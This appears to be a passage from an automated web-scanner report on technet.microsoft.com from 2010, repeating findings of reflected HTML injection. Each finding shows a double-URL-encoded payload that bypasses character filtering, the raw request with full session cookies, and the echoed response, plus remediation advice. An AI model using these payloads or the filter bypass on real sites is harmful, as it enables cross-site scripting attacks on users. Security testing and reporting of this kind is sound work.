18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10208
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:23:50 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727067.aspxa87d4"><a>c2cdf0cd2d" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22725%2522%253e%253ca%253eb76dc023418 was submitted in the REST URL parameter 1. This input was echoed as 22725"><a>b76dc023418 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us22725%2522%253e%253ca%253eb76dc023418/library/bb727069.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:25:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us22725"><a>b76dc023418/library/bb727069" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a394%2522%253e%253ca%253e7a645869883 was submitted in the REST URL parameter 1. This input was echoed as 2a394"><a>7a645869883 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us2a394%2522%253e%253ca%253e7a645869883/library/bb727070.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:12 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us2a394"><a>7a645869883/library/bb727070" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73213%2522%253e%253ca%253ee7b19e7d711 was submitted in the REST URL parameter 2. This input was echoed as 73213"><a>e7b19e7d711 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library73213%2522%253e%253ca%253ee7b19e7d711/bb727070.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library73213"><a>e7b19e7d711/bb727070" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d35f4%2522%253e%253ca%253e1af6e525b2c was submitted in the REST URL parameter 3. This input was echoed as d35f4"><a>1af6e525b2c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727070.aspxd35f4%2522%253e%253ca%253e1af6e525b2c HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727070.aspxd35f4"><a>1af6e525b2c" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25365%2522%253e%253ca%253e10433910e44 was submitted in the REST URL parameter 1. This input was echoed as 25365"><a>10433910e44 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us25365%2522%253e%253ca%253e10433910e44/library/bb727085.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us25365"><a>10433910e44/library/bb727085" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb47%2522%253e%253ca%253edd5971e5505 was submitted in the REST URL parameter 2. This input was echoed as 2bb47"><a>dd5971e5505 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2bb47%2522%253e%253ca%253edd5971e5505/bb727085.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:30 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2bb47"><a>dd5971e5505/bb727085" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca19c%2522%253e%253ca%253e185ce44d500 was submitted in the REST URL parameter 3. This input was echoed as ca19c"><a>185ce44d500 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727085.aspxca19c%2522%253e%253ca%253e185ce44d500 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
